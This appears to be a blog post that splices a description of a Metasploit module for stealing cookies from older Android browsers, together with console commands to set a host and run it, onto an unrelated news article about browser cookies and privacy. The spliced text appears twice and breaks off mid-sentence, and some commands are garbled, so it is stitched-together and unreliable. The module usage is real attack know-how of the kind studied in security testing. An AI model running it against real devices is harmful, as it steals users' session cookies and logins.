|
|
|
Android Browser "Open in New Tab" Cookie Thieft
 In Android’s stock AOSP Browser application and WebView component, the “open in new tab” functionality allows a file URL to be opened. On versions of Android before 4.4, the path to the sqlite cookie database could be specified. By saving a cookie containing a tag and then loading the sqlite database into the browser as an HTML file, XSS can be achieved inside the cookie file, disclosing all cookies (HttpOnly or not) to an attacker. To display the available options, load the module within the Metasploit console and run the commands ‘show options’ or 'show advanced’:
msf > use auxiliary/gather/android_browser_new_tab_cookie_theft
msf auxiliary(android_browser_new_tab_cookie_theft) > show options
auxiliary(android_browser_new_tab_cookie_theft) > set Rhost 192.168.56.1
auxiliary(android_browser_new_tab_cookie_theft) > show Rport 4545
auxiliary(android_browser_new_tab_cookie_theft) > run
“They (HTTP cookies) let websites remember you, your website logins and more. But they can also be a treasure trove of private information for hackers,” he said. Rulindana notes that while most cookies are perfectly safe, guarding online privacy can be overwhelming. “Some websites are not secure, and this allows hackers to intercept cookies and view the information they carry. Frankly the cookies themselves are not harmful, but because they may carry personal information, it is better to use cookies on sites that are trusted to be secure” he noted What are cookies and what do they do? In essence, the term cookie refers to information stored by a website on the user’s local browser, said Patricie Nostalgie, a software engineer. “They are basically used to keep track of visitors. If a user is browsing, the information he sees are stored somewhere in the cloud on a machine that we call Server. So the server has the task of processing the requests received from web browsers and reply back with the information requested,” “And this takes a lot of resources as one server can be serving thousands of users. So sometimes developers can choose to store some general information on the client side so that when a user visits the website for the second time, he gets the info from his local machine without sending the request to the server,” he added. What information can they hold? Computer cookies according to Rulindana normally store private info including the amount of time a user spends on the particular website, different links a person clicks while using the website. Accounts they log into, pages visited among others. What happens if you don’t accept a cookie? The flip side of not accepting cookies is that some companies will not let users access their websites. However, Rulindana said that, “But for the most part, you will still be able to access the majority of the internet without accepting cookies.” Commenting on the advantage of accepting cookies, he added, “you will likely get a more tailored experience with more relevant content, so it is usually worth it, unless the user is particularly fearful about privacy”. Are internet cookies safe? Under normal circumstances, Nostalgie says that cookies are generally used to improve the experience of users. But, he added that there has been controversy from privacy advocates who would rather not have information about themselves being stores, particularly relating to their browsing habits. “Cookies are not safe as they are stored in plain texts, so it’s not advisable to accept cookies on high sensitive websites such as those with payment
|
|
|
|
Android Browser "Open in New Tab" Cookie Thieft
In Android’s stock AOSP Browser application and WebView component, the “open in new tab” functionality allows a file URL to be opened. On versions of Android before 4.4, the path to the sqlite cookie database could be specified. By saving a cookie containing a tag and then loading the sqlite database into the browser as an HTML file, XSS can be achieved inside the cookie file, disclosing all cookies (HttpOnly or not) to an attacker.
To display the available options, load the module within the Metasploit console and run the commands ‘show options’ or 'show advanced’:
msf > use auxiliary/gather/android_browser_new_tab_cookie_theft
msf auxiliary(android_browser_new_tab_cookie_theft) > show options
auxiliary(android_browser_new_tab_cookie_theft) > set Rhost 192.168.56.1
auxiliary(android_browser_new_tab_cookie_theft) > show Rport 4545
auxiliary(android_browser_new_tab_cookie_theft) > run
“They (HTTP cookies) let websites remember you, your website logins and more. But they can also be a treasure trove of private information for hackers,” he said.
Rulindana notes that while most cookies are perfectly safe, guarding online privacy can be overwhelming.
“Some websites are not secure, and this allows hackers to intercept cookies and view the information they carry. Frankly the cookies themselves are not harmful, but because they may carry personal information, it is better to use cookies on sites that are trusted to be secure” he noted
What are cookies and what do they do?
In essence, the term cookie refers to information stored by a website on the user’s local browser, said Patricie Nostalgie, a software engineer.
“They are basically used to keep track of visitors. If a user is browsing, the information he sees are stored somewhere in the cloud on a machine that we call Server. So the server has the task of processing the requests received from web browsers and reply back with the information requested,”
“And this takes a lot of resources as one server can be serving thousands of users. So sometimes developers can choose to store some general information on the client side so that when a user visits the website for the second time, he gets the info from his local machine without sending the request to the server,” he added.
What information can they hold?
Computer cookies according to Rulindana normally store private info including the amount of time a user spends on the particular website, different links a person clicks while using the website. Accounts they log into, pages visited among others.
What happens if you don’t accept a cookie?
The flip side of not accepting cookies is that some companies will not let users access their websites.
However, Rulindana said that, “But for the most part, you will still be able to access the majority of the internet without accepting cookies.”
Commenting on the advantage of accepting cookies, he added, “you will likely get a more tailored experience with more relevant content, so it is usually worth it, unless the user is particularly fearful about privacy”.
Are internet cookies safe?
Under normal circumstances, Nostalgie says that cookies are generally used to improve the experience of users.
But, he added that there has been controversy from privacy advocates who would rather not have information about themselves being stores, particularly relating to their browsing habits.
“Cookies are not safe as they are stored in plain texts, so it’s not advisable to accept cookies on high sensitive websites such as those with payment
Posts
0 Comments:
Post a Comment